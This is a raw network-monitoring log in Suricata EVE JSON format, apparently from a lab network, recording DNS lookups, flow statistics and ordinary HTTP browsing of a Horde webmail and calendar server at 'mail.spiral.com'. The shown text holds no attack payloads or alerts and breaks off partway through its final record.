{"timestamp":"2020-02-29T00:02:28.812490+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:28.812490+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:29.000724+0000","flow_id":136591399180898,"event_type":"flow","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":1777,"bytes_toclient":1792,"start":"2020-02-29T00:01:23.121442+0000","end":"2020-02-29T00:01:28.332392+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:29.118397+0000","flow_id":1530510154133066,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30700,"tx_id":0}} {"timestamp":"2020-02-29T00:02:30.003648+0000","flow_id":1393011066924782,"event_type":"flow","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":15,"bytes_toserver":1828,"bytes_toclient":11853,"start":"2020-02-29T00:01:19.978670+0000","end":"2020-02-29T00:01:29.023351+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:33.551797+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37713,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:33.574791+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52664,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":1}} {"timestamp":"2020-02-29T00:02:33.658408+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35837,"proto":"UDP","dns":{"type":"answer","id":37713,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:33.658408+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35837,"proto":"UDP","dns":{"type":"answer","id":37713,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:33.756645+0000","flow_id":432102333557313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287}} {"timestamp":"2020-02-29T00:02:34.000216+0000","event_type":"stats","stats":{"uptime":13806,"capture":{"kernel_packets":132616,"kernel_drops":0},"decoder":{"pkts":132628,"bytes":92028677,"invalid":180,"ipv4":131199,"ipv6":8,"ethernet":132628,"raw":0,"null":0,"sll":0,"tcp":126203,"udp":4802,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2672,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2688,"synack":2679,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1717,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2189,"failed_udp":106},"tx":{"http":4462,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2266}},"flow_mgr":{"closed_pruned":2650,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21159,"memcap_state":0,"memcap_global":0},"http":{"memuse":37055,"memcap":0}}} {"timestamp":"2020-02-29T00:02:34.001094+0000","flow_id":849006199346554,"event_type":"flow","src_ip":"192.168.10.122","src_port":43852,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:32.890234+0000","end":"2020-02-28T23:57:33.002100+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:34.001823+0000","flow_id":1794109457924391,"event_type":"flow","src_ip":"192.168.10.122","src_port":51275,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:33.622887+0000","end":"2020-02-28T23:57:33.734194+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:36.000710+0000","flow_id":679183207983578,"event_type":"flow","src_ip":"192.168.10.130","src_port":34694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":18,"bytes_toserver":1670,"bytes_toclient":20546,"start":"2020-02-29T00:01:29.944602+0000","end":"2020-02-29T00:01:35.171147+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:38.757982+0000","flow_id":432102333557313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34702,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16438,"tx_id":0}} {"timestamp":"2020-02-29T00:02:39.033401+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1586,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:39.144484+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39579,"proto":"UDP","dns":{"type":"answer","id":1586,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:39.144484+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39579,"proto":"UDP","dns":{"type":"answer","id":1586,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:39.200940+0000","flow_id":667500901523119,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4211}} {"timestamp":"2020-02-29T00:02:40.000187+0000","flow_id":1615370099269153,"event_type":"flow","src_ip":"192.168.10.122","src_port":58514,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:38.761377+0000","end":"2020-02-28T23:57:38.872715+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:40.000436+0000","flow_id":2191913624185226,"event_type":"flow","src_ip":"192.168.10.122","src_port":36276,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:38.567690+0000","end":"2020-02-28T23:57:38.678900+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:41.000155+0000","event_type":"stats","stats":{"uptime":13813,"capture":{"kernel_packets":132655,"kernel_drops":0},"decoder":{"pkts":132655,"bytes":92034766,"invalid":180,"ipv4":131226,"ipv6":8,"ethernet":132655,"raw":0,"null":0,"sll":0,"tcp":126227,"udp":4805,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2674,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2690,"synack":2681,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1718,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2191,"failed_udp":106},"tx":{"http":4463,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2268}},"flow_mgr":{"closed_pruned":2651,"new_pruned":15,"est_pruned":2237,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20166,"memcap_state":0,"memcap_global":0},"http":{"memuse":53939,"memcap":0}}} {"timestamp":"2020-02-29T00:02:41.140036+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42164,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35317,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:41.244983+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42164,"proto":"UDP","dns":{"type":"answer","id":35317,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:41.244983+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42164,"proto":"UDP","dns":{"type":"answer","id":35317,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:41.420240+0000","flow_id":612061463836783,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897}} {"timestamp":"2020-02-29T00:02:44.205072+0000","flow_id":667500901523119,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34704,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4211},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18534,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.228358+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33488,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25550,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:46.339559+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33488,"proto":"UDP","dns":{"type":"answer","id":25550,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:46.339559+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33488,"proto":"UDP","dns":{"type":"answer","id":25550,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:46.422892+0000","flow_id":612061463836783,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34706,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.754219+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43799,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1892,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:46.762300+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":225,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.771672+0000","flow_id":1433087412423287,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4238}} {"timestamp":"2020-02-29T00:02:46.861282+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43799,"proto":"UDP","dns":{"type":"answer","id":1892,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:46.861282+0000","flow_id":28091940766251,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43799,"proto":"UDP","dns":{"type":"answer","id":1892,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.000764+0000","flow_id":758296490976534,"event_type":"flow","src_ip":"192.168.10.122","src_port":42304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:46.173334+0000","end":"2020-02-28T23:57:46.284674+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:47.047330+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24344}} {"timestamp":"2020-02-29T00:02:47.196304+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24344},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:02:47.204147+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50132,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.309811+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33988,"proto":"UDP","dns":{"type":"answer","id":50132,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.309811+0000","flow_id":406165026970995,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33988,"proto":"UDP","dns":{"type":"answer","id":50132,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.346710+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:02:47.346710+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:02:47.376092+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":1}} {"timestamp":"2020-02-29T00:02:47.390279+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15738,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.501100+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":15738,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.501100+0000","flow_id":206771170309255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":15738,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.528668+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36753,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58469,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:47.634105+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36753,"proto":"UDP","dns":{"type":"answer","id":58469,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:47.634105+0000","flow_id":979672010002716,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36753,"proto":"UDP","dns":{"type":"answer","id":58469,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:47.663233+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:02:47.663233+0000","flow_id":2193489897440047,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:02:47.707900+0000","flow_id":240989174631820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34710,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 